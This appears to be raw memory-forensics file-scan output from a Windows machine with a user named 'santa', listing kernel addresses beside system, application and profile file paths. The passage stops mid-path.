+0x918b764aa8d0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin 216 +0x918b764aabf0 \$Directory 216 +0x918b764aad80 \$Directory 216 +0x918b764ab0a0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin 216 +0x918b764ab230 \Windows\System32\en-US\hcproviders.dll.mui 216 +0x918b764ab550 \Windows\System32\en-US\Windows.Globalization.dll.mui 216 +0x918b764ab6e0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 216 +0x918b764ab870 \Windows\System32\wuuhosdeployment.dll 216 +0x918b764aba00 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll 216 +0x918b764abeb0 \Windows\System32\en-US\windows.ui.xaml.dll.mui 216 +0x918b764ac1d0 \ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx 216 +0x918b764ac360 \Windows\Fonts\segoeuib.ttf 216 +0x918b764ac4f0 \Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx 216 +0x918b764ac680 \Windows\System32\msauserext.dll 216 +0x918b764ac810 \Sessions\1\AppContainerNamedObjects\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 216 +0x918b764acb30 \Windows\Fonts\constan.ttf 216 +0x918b764accc0 \$Directory 216 +0x918b764ace50 \$Directory 216 +0x918b764ad170 \$Directory 216 +0x918b764ad300 \Windows\Fonts\constanz.ttf 216 +0x918b764ad490 \ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.jfm 216 +0x918b764ad620 \Windows\System32\Windows.Storage.Search.dll 216 +0x918b764ad7b0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy 216 +0x918b764ad940 \Windows\System32\RTMediaFrame.dll 216 +0x918b764adc60 \Windows\System32\Windows.Cortana.Desktop.dll 216 +0x918b764ae110 \$Directory 216 +0x918b764ae2a0 \ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb 216 +0x918b764ae5c0 \Windows\Fonts\ebrima.ttf 216 +0x918b764ae750 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b764ae8e0 \Windows\System32\SystemSettings.SettingsExtensibility.dll 216 +0x918b764aea70 \Windows\System32\WinBioPlugIns\NUIVoiceWBSAdapters.dll 216 +0x918b764aec00 \Program Files (x86)\Mozilla Firefox\mozavutil.dll 216 +0x918b764af0b0 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\pris\resources.en-US.pri 216 +0x918b764af3d0 \$Directory 216 +0x918b764af560 \Windows\System32\UIAutomationCore.dll 216 +0x918b764af6f0 \Windows\Fonts\constani.ttf 216 +0x918b764af880 \$Directory 216 +0x918b764afba0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b764afec0 \$Directory 216 +0x918b764b0370 \Windows\System32\BthAvctpSvc.dll 216 +0x918b764b0500 \Windows\Fonts\cour.ttf 216 +0x918b764b0820 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\pris\resources.en-US.pri 216 +0x918b764b09b0 \$Directory 216 +0x918b764b0b40 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b764b0cd0 \Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx 216 +0x918b764b0e60 \$Directory 216 +0x918b764b1180 \$Directory 216 +0x918b764b1310 \MsFteWds 216 +0x918b764b1630 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b764b1ae0 \Program Files (x86)\Mozilla Firefox\mozglue.dll 216 +0x918b764b1e00 \CMApi 216 +0x918b764b2120 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b764b2440 \$Directory 216 +0x918b764b25d0 \Windows\System32\NPSMDesktopProvider.dll 216 +0x918b764b2760 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b764b2a80 \Windows\System32\en-US\combase.dll.mui 216 +0x918b764b30c0 \$Directory 216 +0x918b764b3250 \Program Files\Common Files\microsoft shared\ink\IpsPlugin.dll 216 +0x918b764b33e0 \Program Files (x86)\Mozilla Firefox\mozavcodec.dll 216 +0x918b764b3700 \Windows\Fonts\segoeui.ttf 216 +0x918b764b3890 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG2 216 +0x918b764b3d40 \Windows\System32\msidle.dll 216 +0x918b764b41f0 \Windows\System32\Windows.Cortana.PAL.Desktop.dll 216 +0x918b764b4380 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b764b4510 \Windows\Registration\R000000000006.clb 216 +0x918b764b46a0 \Windows\System32\PersonaX.dll 216 +0x918b764b4830 \Windows\System32\ActionMgr.dll 216 +0x918b764b49c0 \$Directory 216 +0x918b764b4b50 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat 216 +0x918b764b4ce0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\resources.pri 216 +0x918b764b5190 \ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.2.gthr 216 +0x918b764b5320 \Windows\rescache\_merged\3199136011\4162976336.pri 216 +0x918b764b57d0 \$Directory 216 +0x918b764b5960 \ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.2.Crwl 216 +0x918b764b5af0 \Windows\System32\Speech_OneCore\common\sapi_onecore.dll 216 +0x918b764b5e10 \Windows\System32 216 +0x918b764b6130 \Windows\System32\RuntimeBroker.exe 216 +0x918b764b62c0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 216 +0x918b764b6450 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1 216 +0x918b764b6770 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat 216 +0x918b764b7260 \Windows\SystemResources\tquery.dll.mun 216 +0x918b764b73f0 \Windows\System32\winevt\Logs\Microsoft-Windows-FileHistory-Core%4WHC.evtx 216 +0x918b764b7580 \Windows\System32\mfplat.dll 216 +0x918b764b7710 \Windows\System32\Windows.Cortana.OneCore.dll 216 +0x918b764b78a0 \Windows\System32\Windows.Cortana.ProxyStub.dll 216 +0x918b764b7a30 \Windows\System32\EdgeManager.dll 216 +0x918b764b7bc0 \ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 216 +0x918b764b7d50 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl 216 +0x918b764b7ee0 \Windows\Registration\R000000000006.clb 216 +0x918b764b8200 \$Directory 216 +0x918b764b8390 \Windows\Fonts\courbd.ttf 216 +0x918b764b8520 \Windows\System32\msftedit.dll 216 +0x918b764b86b0 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 216 +0x918b764b8840 \Windows\System32\UserDataTypeHelperUtil.dll 216 +0x918b764b89d0 \Windows\System32\LicenseManagerSvc.dll 216 +0x918b764b8b60 \Windows\Fonts\couri.ttf 216 +0x918b764b8cf0 \Windows\Fonts\courbi.ttf 216 +0x918b764b8e80 \Windows\System32\globinputhost.dll 216 +0x918b764b91a0 \Windows\System32\SpeechPal.dll 216 +0x918b764b9330 \Windows\System32\Windows.UI.Input.Inking.dll 216 +0x918b764b94c0 \Windows\System32\Windows.ApplicationModel.Background.TimeBroker.dll 216 +0x918b764b9650 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 216 +0x918b764b97e0 \$Directory 216 +0x918b764b9970 \Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe 216 +0x918b764b9c90 \$Directory 216 +0x918b764b9e20 \$Directory 216 +0x918b764ba140 \Windows\System32\edgehtml.dll 216 +0x918b764ba2d0 \Windows\System32\WinBioDatabase\51F39552-1075-4199-B513-0C10EA185DB0.DAT 216 +0x918b764ba460 \Windows\System32\icuin.dll 216 +0x918b764ba5f0 \Windows\System32\srpapi.dll 216 +0x918b764ba780 \Windows\System32\icuuc.dll 216 +0x918b764ba910 \Windows\System32\Chakra.dll 216 +0x918b764baaa0 \Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe 216 +0x918b764bac30 \Users\santa\AppData\Local\Microsoft\Windows\WebCacheLock.dat 216 +0x918b764badc0 \$Directory 216 +0x918b764bb0e0 \Windows\System32\rometadata.dll 216 +0x918b764bb270 \Windows\System32\stobject.dll 216 +0x918b764bb400 \Windows\SystemResources\stobject.dll.mun 216 +0x918b764bb590 \Dev\Query 216 +0x918b764bb8b0 \Windows\Fonts\framd.ttf 216 +0x918b764bba40 \$Directory 216 +0x918b764bbbd0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b764bbd60 \Windows\System32\InputSwitch.dll 216 +0x918b764bbef0 \Windows\Temp\MpCmdRun-80-53C9D589-6B66-4F30-9BAB-9A0193B0BAFC.lock 216 +0x918b764bc080 \Windows\System32\Windows.ApplicationModel.Background.SystemEventsBroker.dll 216 +0x918b764bc210 \Windows\Fonts\framdit.ttf 216 +0x918b764bc3a0 \Windows\System32\icu.dll 216 +0x918b764bc6c0 \Windows\System32\WinBioPlugIns\winbiostorageadapter.dll 216 +0x918b764bc9e0 \Dev\Query 216 +0x918b764bcb70 \Users\santa\AppData\Local\Microsoft\GameDVR 216 +0x918b764bcd00 \CMNotify 216 +0x918b764bd1b0 \ProgramData\Microsoft\Windows\Start Menu 216 +0x918b764bd340 \Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy 216 +0x918b764bd4d0 \Windows\System32\wuapi.dll 216 +0x918b764bd660 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b764bd7f0 \$Directory 216 +0x918b764bdb10 \$Directory 216 +0x918b764bdca0 \Windows\System32\wups.dll 216 +0x918b764bde30 \$Directory 216 +0x918b764be150 \Windows\bcastdvr 216 +0x918b764be2e0 \Windows\System32\ieframe.dll 216 +0x918b764be470 \Windows\System32\C_1257.NLS 216 +0x918b764be790 \Windows\Registration\R000000000006.clb 216 +0x918b764be920 \Windows\System32\batmeter.dll 216 +0x918b764beab0 \Windows\System32\C_932.NLS 216 +0x918b764bec40 \Windows\SysWOW64\taskschd.dll 216 +0x918b764bedd0 \Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx 216 +0x918b764bf280 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpCmdRun.exe 216 +0x918b764bf410 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b764bf5a0 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache 216 +0x918b764bf730 \Windows\System32\Windows.UI.Shell.dll 216 +0x918b764bfa50 \Dev\Query 216 +0x918b764bfbe0 \Windows\System32\winevt\Logs\Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx 216 +0x918b764bfd70 \$Directory 216 +0x918b764c0090 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\resources.pri 216 +0x918b764c0220 \Windows\System32\en-US\setupapi.dll.mui 216 +0x918b764c03b0 \Windows\System32\ksuser.dll 216 +0x918b764c0540 \Windows\System32\C_1258.NLS 216 +0x918b764c06d0 \CMApi 216 +0x918b764c0860 \Windows\System32\winevt\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx 216 +0x918b764c09f0 \Windows\System32\C_949.NLS 216 +0x918b764c0d10 \Windows\System32\C_874.NLS 216 +0x918b764c0ea0 \Windows\System32\atlthunk.dll 216 +0x918b764c14e0 \Windows\Fonts\gadugib.ttf 216 +0x918b764c1670 \Windows\SystemResources\SndVolSSO.dll.mun 216 +0x918b764c1800 \Windows\System32\C_950.NLS 216 +0x918b764c1e40 \ProgramData\Microsoft\Windows\Start Menu 216 +0x918b764c2160 \CMApi 216 +0x918b764c22f0 \Windows\Fonts\gadugi.ttf 216 +0x918b764c2480 \Windows\System32\DXP.dll 216 +0x918b764c2610 \Windows\Fonts\georgia.ttf 216 +0x918b764c27a0 \Windows\System32\dcntel.dll 216 +0x918b764c2930 \Windows\System32\en-US\vsstrace.dll.mui 216 +0x918b764c2ac0 \Windows\System32\C_936.NLS 216 +0x918b764c2c50 \$Directory 216 +0x918b764c2de0 \Windows\System32\en-US\userenv.dll.mui 216 +0x918b764c3100 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b764c3420 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b764c35b0 \SearchTextHarvester 216 +0x918b764c3740 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b764c38d0 \Windows\ShellExperiences\QuickActions.dll 216 +0x918b764c3a60 \$Directory 216 +0x918b764c3bf0 \Windows\Fonts\segoeui.ttf 216 +0x918b764c3d80 \Windows\System32\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx 216 +0x918b764c40a0 \Windows\rescache\_merged\2467931877\57170662.pri 216 +0x918b764c4230 \$Directory 216 +0x918b764c43c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b764c4870 \Windows\System32\shdocvw.dll 216 +0x918b764c4b90 \Windows\ShellExperiences\Windows.UI.ActionCenter.dll 216 +0x918b764c4d20 \Windows\System32\QuickActionsDataModel.dll 216 +0x918b764c4eb0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b764c51d0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b764c5360 \Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources.pri 216 +0x918b764c54f0 \$Directory 216 +0x918b764c59a0 \Windows\System32\ActionCenter.dll 216 +0x918b764c5cc0 \Windows\rescache\_merged\1988845358\2257490454.pri 216 +0x918b764c6170 \$Directory 216 +0x918b764c6300 \$Directory 216 +0x918b764c6490 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b764c6620 \CMNotify 216 +0x918b764c67b0 \Endpoint 216 +0x918b764c6940 \CMNotify 216 +0x918b764c6c60 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b764c72a0 \CMNotify 216 +0x918b764c75c0 \CMNotify 216 +0x918b764c7750 \CMNotify 216 +0x918b764c78e0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b764c7a70 \CMNotify 216 +0x918b764c7c00 \$Directory 216 +0x918b764c8240 \Windows\SysWOW64\D3DCompiler_47.dll 216 +0x918b764c83d0 \Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx 216 +0x918b764c8560 \Windows\System32\en-US\sndvolsso.dll.mui 216 +0x918b764c8880 \$Directory 216 +0x918b764c8a10 \CMNotify 216 +0x918b764c8ba0 \Windows\Fonts\taile.ttf 216 +0x918b764c8ec0 \Windows\SoftwareDistribution\DataStore\DataStore.edb 216 +0x918b764c9500 \Windows\System32\Syncreg.dll 216 +0x918b764c9690 \$Directory 216 +0x918b764c9820 \Program Files (x86)\Mozilla Firefox\libGLESv2.dll 216 +0x918b764c99b0 \CMNotify 216 +0x918b764c9b40 \$Directory 216 +0x918b764c9cd0 \Program Files (x86)\Mozilla Firefox\libEGL.dll 216 +0x918b764c9e60 \$Directory 216 +0x918b764ca180 \$Directory 216 +0x918b764ca7c0 \CMNotify 216 +0x918b764ca950 \Windows\System32\pnidui.dll 216 +0x918b764caae0 \Users\santa\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log 216 +0x918b764cac70 \Windows\System32\winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx 216 +0x918b764cb760 \Windows\SoftwareDistribution\DataStore\DataStore.edb 216 +0x918b764cb8f0 \Windows\SysWOW64\d3d9.dll 216 +0x918b764cba80 \CMNotify 216 +0x918b764cbc10 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b764cbda0 \Windows\SoftwareDistribution\DataStore\DataStore.jfm 216 +0x918b764cc0c0 \Windows\SystemResources\notepad.exe.mun 216 +0x918b764cc250 \CMNotify 216 +0x918b764cc3e0 \Endpoint 216 +0x918b764cc570 \Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs 216 +0x918b764cc700 \$Directory 216 +0x918b764cca20 \Windows\System32\EthernetMediaManager.dll 216 +0x918b764cced0 \CMNotify 216 +0x918b764cd1f0 \Windows\System32\NetworkUXBroker.dll 216 +0x918b764cd6a0 \Windows\System32\en-US\pnidui.dll.mui 216 +0x918b764cd830 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b764cd9c0 \Windows\System32\edgeIso.dll 216 +0x918b764cdb50 \Windows\System32\WaaSMedicSvc.dll 216 +0x918b764cdce0 \Windows\System32\WaaSMedicPS.dll 216 +0x918b764cde70 \Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs 216 +0x918b764ce4b0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b764ce640 \Windows\System32\PortableDeviceTypes.dll 216 +0x918b764ce7d0 \Windows\System32\SettingMonitor.dll 216 +0x918b764ce960 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b764cf130 \Windows\System32\srchadmin.dll 216 +0x918b764cf2c0 \$Directory 216 +0x918b764cf450 \Endpoint 216 +0x918b764cf770 \Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu 216 +0x918b764cf900 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe 216 +0x918b764cfa90 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b764cfc20 \Windows\Fonts\phagspa.ttf 216 +0x918b764d00d0 \$Directory 216 +0x918b764d0260 \Windows\System32\sppsvc.exe 216 +0x918b764d03f0 \Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu 216 +0x918b764d0580 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b764d0710 \Windows\Fonts\ntailu.ttf 216 +0x918b764d08a0 \Windows\Fonts\ntailub.ttf 216 +0x918b764d0a30 \Windows\Fonts\phagspab.ttf 216 +0x918b764d0bc0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b764d0d50 \Users\santa\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.LOG2 216 +0x918b764d0ee0 \Windows\System32\en-US\Windows.Globalization.dll.mui 216 +0x918b764d1200 \Windows\System32\en-US\bthprops.cpl.mui 216 +0x918b764d1390 \Windows\System32\msimtf.dll 216 +0x918b764d1520 \Users\santa\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat 216 +0x918b764d16b0 \Windows\Fonts\taileb.ttf 216 +0x918b764d1840 \Windows\System32\bthprops.cpl 216 +0x918b764d19d0 \Windows\System32\en-US\explorerframe.dll.mui 216 +0x918b764d1b60 \CMNotify 216 +0x918b764d1e80 \Users\santa\AppData\Local\Microsoft\OneDrive\OneDrive.exe 216 +0x918b764d2330 \Users\santa\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.LOG1 216 +0x918b764d24c0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe 216 +0x918b764d2650 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b764d27e0 \Windows\System32 216 +0x918b764d2970 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe 216 +0x918b764d2b00 \Windows\Fonts\segoepr.ttf 216 +0x918b764d3140 \Users\santa\Desktop 216 +0x918b764d32d0 \Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.28604.0_x64__8wekyb3d8bbwe\mrt100_app.dll 216 +0x918b764d3460 \Windows\SysWOW64\rsaenh.dll 216 +0x918b764d35f0 \Windows\System32\CompatTelRunner.exe 216 +0x918b764d3780 \Windows\Fonts\arial.ttf 216 +0x918b764d3aa0 \Windows\SysWOW64\en-US\urlmon.dll.mui 216 +0x918b764d40e0 \Users\Public\Desktop 216 +0x918b764d4270 \CMApi 216 +0x918b764d4400 \Users\santa\Desktop 216 +0x918b764d48b0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Notes.dll 216 +0x918b764d4a40 \Windows\System32\en-US\Conhost.exe.mui 216 +0x918b764d4bd0 \Users\Public\Desktop 216 +0x918b764d4d60 \Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.29512.0_x64__8wekyb3d8bbwe\SharedLibrary.dll 216 +0x918b764d4ef0 \Users\santa\AppData\Roaming\Microsoft\Windows\Network Shortcuts 216 +0x918b764d5080 \$Directory 216 +0x918b764d5210 \Users\santa\AppData\Roaming\Microsoft\Windows\Network Shortcuts 216 +0x918b764d53a0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\e_sqlite3.dll 216 +0x918b764d5530 \$Directory 216 +0x918b764d56c0 \Windows\System32\mrt100.dll 216 +0x918b764d5850 \$Directory 216 +0x918b764d5d00 \Windows\SysWOW64\en-US\iertutil.dll.mui 216 +0x918b7696c370 \$Directory 216 +0x918b7696c500 \$Directory 216 +0x918b7696c690 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b7696c820 \Windows\System32\en-US\imapi2.dll.mui 216 +0x918b7696c9b0 \Windows\SysWOW64\DWrite.dll 216 +0x918b7696cb40 \Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\Assets\LockMDL2.ttf 216 +0x918b7696ce60 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b7696d180 \Windows\SoftwareDistribution\ReportingEvents.log 216 +0x918b7696d7c0 \Windows\System32\notepad.exe 216 +0x918b7696dae0 \Windows\System32\updatepolicy.dll 216 +0x918b7696dc70 \Windows\System32\AuthBroker.dll 216 +0x918b7696de00 \CMNotify 216 +0x918b7696e2b0 \Windows\Registration\R000000000006.clb 216 +0x918b7696e440 \Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\Assets\LockMDL2.ttf 216 +0x918b7696e5d0 \$Directory 216 +0x918b7696e8f0 \Windows\System32\gamestreamingext.dll 216 +0x918b7696ea80 \$Directory 216 +0x918b7696ec10 \$Directory 216 +0x918b7696eda0 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b7696f0c0 \Windows\System32\en-US\edgehtml.dll.mui 216 +0x918b7696f250 \Windows\System32\Windows.Management.Workplace.dll 216 +0x918b7696f570 \Windows\System32\SyncCenter.dll 216 +0x918b7696f700 \$Directory 216 +0x918b7696fa20 \$Directory 216 +0x918b7696fd40 \Windows\System32\en-US\rsaenh.dll.mui 216 +0x918b7696fed0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b769701f0 \$Directory 216 +0x918b76970380 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b76970510 \Windows\System32\imapi2.dll 216 +0x918b769706a0 \Windows\System32\wuuhext.dll 216 +0x918b76970830 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b769709c0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\1209553808LCo7g%sCD7a%t7adbca6s.sqlite-shm 216 +0x918b76970b50 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76970ce0 \Windows\System32\WinMetadata\Windows.UI.winmd 216 +0x918b76970e70 \Windows\System32\WinMetadata\Windows.ApplicationModel.winmd 216 +0x918b76971190 \Windows\SysWOW64\dxgi.dll 216 +0x918b76971320 \Windows\System32\en-US\netmsg.dll.mui 216 +0x918b76971640 \Windows\System32\en-US\Windows.Security.Authentication.Web.Core.dll.mui 216 +0x918b76971960 \$Directory 216 +0x918b76971af0 \$Directory 216 +0x918b76971c80 \Windows\SystemResources\Windows.UI.SettingsAppThreshold\Windows.UI.SettingsAppThreshold.pri 216 +0x918b76971e10 \$Directory 216 +0x918b76972130 \$Directory 216 +0x918b769722c0 \Windows\System32\svchost.exe 216 +0x918b76972450 \$Directory 216 +0x918b76972770 \Windows\Fonts\seguiemj.ttf 216 +0x918b76972900 \Windows\Fonts\arial.ttf 216 +0x918b76972a90 \Windows\Fonts\seguisb.ttf 216 +0x918b76972c20 \$Directory 216 +0x918b76972db0 \$Directory 216 +0x918b76973260 \Windows\System32\smartscreenps.dll 216 +0x918b769733f0 \Windows\Registration\R000000000006.clb 216 +0x918b76973580 \Windows\Globalization\ICU\windowsZones.res 216 +0x918b769738a0 \Windows\Fonts\seguisb.ttf 216 +0x918b76973bc0 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b76973d50 \$Directory 216 +0x918b76973ee0 \Windows\rescache\_merged\3440028264\2043174863.pri 216 +0x918b76974200 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b76974520 \Windows\ImmersiveControlPanel\Telemetry.Common.dll 216 +0x918b769749d0 \Users\santa\AppData\Local\Comms\UnistoreDB\store.jfm 216 +0x918b76974b60 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\Devices-light.png 216 +0x918b76974cf0 \Windows\System32\WinMetadata\Windows.UI.Xaml.winmd 216 +0x918b76974e80 \$Directory 216 +0x918b769751a0 \$ConvertToNonresident 216 +0x918b76975650 \Windows\Fonts\segoeui.ttf 216 +0x918b769757e0 \Users\santa\AppData\Local\Comms\UnistoreDB\store.vol 216 +0x918b76975970 \Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll 216 +0x918b76975b00 \Windows\System32\notepad.exe 216 +0x918b76975c90 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll 216 +0x918b76976460 \Windows\System32\newdev.dll 216 +0x918b76976910 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db 216 +0x918b76976aa0 \Windows\System32\en-US\winhttp.dll.mui 216 +0x918b76976c30 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db 216 +0x918b76976dc0 \Windows\System32\OnDemandBrokerClient.dll 216 +0x918b769770e0 \Windows\System32\AppxPackaging.dll 216 +0x918b76977270 \Windows\System32\winevt\Logs\Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx 216 +0x918b76977590 \$ConvertToNonresident 216 +0x918b76977720 \Windows\System32\devrtl.dll 216 +0x918b769778b0 \Windows\Fonts\segoeui.ttf 216 +0x918b76977a40 \Windows 216 +0x918b76977bd0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db 216 +0x918b76978080 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b76978210 \Windows\System32 216 +0x918b769783a0 \Windows\System32\en-US\netmsg.dll.mui 216 +0x918b769786c0 \Windows\System32\elslad.dll 216 +0x918b76978850 \Windows\SoftwareDistribution\DataStore\Logs\tmp.edb 216 +0x918b769789e0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db 216 +0x918b76978d00 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm 216 +0x918b76979340 \Windows\System32 216 +0x918b769797f0 \Windows\System32\mfreadwrite.dll 216 +0x918b76979980 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b76979ca0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll 216 +0x918b76979e30 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b7697a150 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll 216 +0x918b7697a2e0 \Program 